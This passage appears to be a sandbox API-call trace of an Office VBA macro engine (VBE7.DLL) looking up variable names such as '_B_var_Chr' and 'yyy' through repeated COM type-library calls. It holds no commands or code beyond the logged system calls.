[2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.563] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.563] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3e30) [0060.563] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.563] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.563] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.563] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.563] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.564] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.564] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.564] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d3a3db0000 [0060.564] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3790 [0060.564] _mbscpy_s (in: _Dst=0x1d39dbb3790, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3790) returned 0x0 [0060.564] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.564] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.564] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.564] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.564] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.564] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.565] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.565] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3790) [0060.565] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.565] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.565] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.565] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.565] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.565] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.565] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.565] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3810 [0060.565] _mbscpy_s (in: _Dst=0x1d39dbb3810, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3810) returned 0x0 [0060.565] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.565] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.565] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.565] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.565] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.565] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.565] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.565] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3810) [0060.565] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.565] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.565] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.565] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.565] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.566] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.566] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.566] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3870 [0060.566] _mbscpy_s (in: _Dst=0x1d39dbb3870, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3870) returned 0x0 [0060.566] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.566] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.566] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.566] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.566] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.566] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.566] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.566] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3870) [0060.566] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.566] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.566] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.566] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.566] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.566] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.566] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.566] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.566] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3770 [0060.566] _mbscpy_s (in: _Dst=0x1d39dbb3770, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3770) returned 0x0 [0060.566] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.566] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.566] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.566] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.566] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.566] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.566] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.567] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3770) [0060.567] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.567] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.567] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.567] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.567] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.567] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.567] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.567] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3bf0 [0060.567] _mbscpy_s (in: _Dst=0x1d39dbb3bf0, _DstSizeInBytes=0x4, _Src=0x1d3a3172e3a | out: _Dst=0x1d39dbb3bf0) returned 0x0 [0060.567] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_Chr") returned 0x503b5c [0060.567] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.567] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.567] IUnknown:AddRef (This=0x1d39d9d55e8) returned 0x3 [0060.567] IUnknown:Release (This=0x1d39d9d55e8) returned 0x2 [0060.567] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a98 | out: ppvObject=0x33e4fb4a98*=0x0) returned 0x80004002 [0060.567] IUnknown:QueryInterface (in: This=0x1d39d9d55e8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb4a90 | out: ppvObject=0x33e4fb4a90*=0x0) returned 0x80004002 [0060.567] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39dbb3bf0) [0060.567] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x1d39d9d55e8, ppTLib=0x33e4fb42d0, pIndex=0x0 | out: ppTLib=0x33e4fb42d0*=0x1d3980663b0, pIndex=0x0) returned 0x0 [0060.567] ITypeLib:RemoteGetLibAttr (in: This=0x1d3980663b0, ppTLibAttr=0x33e4fb42e0, pDummy=0x0 | out: ppTLibAttr=0x33e4fb42e0, pDummy=0x0) returned 0x0 [0060.567] ITypeLib:LocalReleaseTLibAttr (This=0x1d3980663b0) returned 0x0 [0060.567] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.567] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0xe4fb42d0, pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0 | out: pBstrDllName=0x0, pBstrName=0x0, pwOrdinal=0x1d38ee9d7a0*=0xf3f0) returned 0x0 [0060.567] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7ffce0c00b70, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0060.567] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x33e4fb42d0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0 | out: pBstrDllName=0x33e4fb42d0*=0x0, pBstrName=0x0, pwOrdinal=0x33e4fb42f0*=0x4560) returned 0x0 [0060.567] ITypeInfo:RemoteGetDllEntry (in: This=0x1d39d9d55e8, memid=1610612738, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pBstrName=0x33e4fb42d0, pwOrdinal=0x500000000) returned 0x0 [0060.567] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="yyy") returned 0x50e071 [0060.567] strcpy_s (in: _Dst=0x33e4fb4760, _DstSize=0x4, _Src="yyy" | out: _Dst="yyy") returned 0x0 [0060.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4760, cbMultiByte=4, lpWideCharStr=0x33e4fb45b0, cchWideChar=4 | out: lpWideCharStr="yyy") returned 4 [0060.568] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.568] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="yyy", lHashVal=0x50e071, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.568] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.568] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x2a [0060.568] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="yyy", lHashVal=0x50e071, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.568] IUnknown:Release (This=0x1d3985c4c00) returned 0x29 [0060.568] IUnknown:AddRef (This=0x1d3980655f0) returned 0xa [0060.568] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="yyy", lHashVal=0x50e071, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.568] IUnknown:Release (This=0x1d3980655f0) returned 0x9 [0060.568] IUnknown:AddRef (This=0x1d3985c5700) returned 0x7 [0060.568] ITypeLib:RemoteIsName (in: This=0x1d3985c5700, szNameBuf="yyy", lHashVal=0x50e071, pfName=0x33e4fb4680, pBstrLibName=0x33e4fb45b0 | out: pfName=0x33e4fb4680*=0, pBstrLibName=0x33e4fb45b0) returned 0x0 [0060.568] IUnknown:Release (This=0x1d3985c5700) returned 0x6 [0060.568] IUnknown:Release (This=0x1d39d552b18) returned 0x6 [0060.568] IUnknown:Release (This=0x1d39d552b18) returned 0x5 [0060.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a32b2c6e, cbMultiByte=4, lpWideCharStr=0x33e4fb46e0, cchWideChar=5 | out: lpWideCharStr="yyy") returned 4 [0060.568] ITypeComp:RemoteBind (in: This=0x1d39d552b20, szName="yyy", lHashVal=0x50e071, wFlags=0x5, ppTInfo=0x33e4fb4698, pDescKind=0x33e4fb46ac, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb4698*=0x0, pDescKind=0x33e4fb46ac*=0, ppFuncDesc=0x33e4fb46b0, ppVarDesc=0x7ffd09599971, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e82, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="yyy") returned 4 [0060.568] ITypeComp:RemoteBind (in: This=0x1d3980663c0, szName="yyy", lHashVal=0x50e071, wFlags=0x5, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e82, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="yyy") returned 4 [0060.568] ITypeComp:RemoteBind (in: This=0x1d3985c4c10, szName="yyy", lHashVal=0x50e071, wFlags=0x5, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e82, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="yyy") returned 4 [0060.568] ITypeComp:RemoteBind (in: This=0x1d398065600, szName="yyy", lHashVal=0x50e071, wFlags=0x5, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x1d39d9d0dd0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.568] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="yyy") returned 0x50e071 [0060.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3172e82, cbMultiByte=4, lpWideCharStr=0x33e4fb4840, cchWideChar=5 | out: lpWideCharStr="yyy") returned 4 [0060.568] ITypeComp:RemoteBind (in: This=0x1d3985c5710, szName="yyy", lHashVal=0x50e071, wFlags=0x5, ppTInfo=0x33e4fb47f8, pDescKind=0x33e4fb480c, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x7ffce09f40b8, ppTypeComp=0x1d300000000, pDummy=0x0 | out: ppTInfo=0x33e4fb47f8*=0x0, pDescKind=0x33e4fb480c*=0, ppFuncDesc=0x33e4fb4810, ppVarDesc=0x7ffce09f40b8, ppTypeComp=0x1d300000000, pDummy=0x0) returned 0x0 [0060.569] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d3984ba6d0, cb=0x800) returned 0x1d398638010 [0060.569] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb) returned 0x1d39dbb3970 [0060.569] _mbscpy_s (in: _Dst=0x1d39dbb3970, _DstSizeInBytes=0x4, _Src=0x1d3a3172e82 | out: _Dst=0x1d39dbb3970) returned 0x0 [0060.569] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="_B_var_yyy") returned 0x509d82 [0060.569] strcpy_s (in: _Dst=0x33e4fb4950, _DstSize=0xb, _Src="_B_var_yyy" | out: _Dst="_B_var_yyy") returned 0x0 [0060.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb4950, cbMultiByte=11, lpWideCharStr=0x33e4fb47a0, cchWideChar=11 | out: lpWideCharStr="_B_var_yyy") returned 11 [0060.569] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.569] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="_B_var_yyy", lHashVal=0x509d82, pfName=0x33e4fb4870, pBstrLibName=0x33e4fb47a0 | out: pfName=0x33e4fb4870*=0, pBstrLibName=0x33e4fb47a0) returned 0x0 [0060.569] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.569] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x2a [0060.569] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="_B_var_yyy", lHashVal=0x509d82, pfName=0x33e4fb4870, pBstrLibName=0x33e4fb47a0 | out: pfName=0x33e4fb4870*=0, pBstrLibName=0x33e4fb47a0) returned 0x0 [0060.569] IUnknown:Release (This=0x1d3985c4c00) returned 0x29 [0060.569] IUnknown:AddRef (This=0x1d3980655f0) returned 0xa [0060.569] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="_B_var_yyy", lHashVal=0x509d82, pfName=0x33e4fb4870, pBstrLibName=0x33e4fb47a0 | out: pfName=0x33e4fb4870*=0, pBstrLibName=0x33e4fb47a0) returned 0x0 [0060.569] IUnknown:Release (This=0x1d3980655f0) returned 0x9 [0060.569] IUnknown:AddRef (This=0x1d3985c5700) returned 0x7 [0060.569] ITypeLib:RemoteIsName (in: This=0x1d3985c5700, szNameBuf="_B_var_yyy", lHashVal=0x509d82, pfName=0x33e4fb4870, pBstrLibName=0x33e4fb47a0 | out: pfName=0x33e4fb4870*=0, pBstrLibName=0x33e4fb47a0) returned 0x0 [0060.569] IUnknown:Release (This=0x1d3985c5700) returned 0x6 [0060.569] IUnknown:AddRef (This=0x1d3980663b0) returned 0xc [0060.569] IUnknown:Release (This=0x1d3980663b0) returned 0xb [0060.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 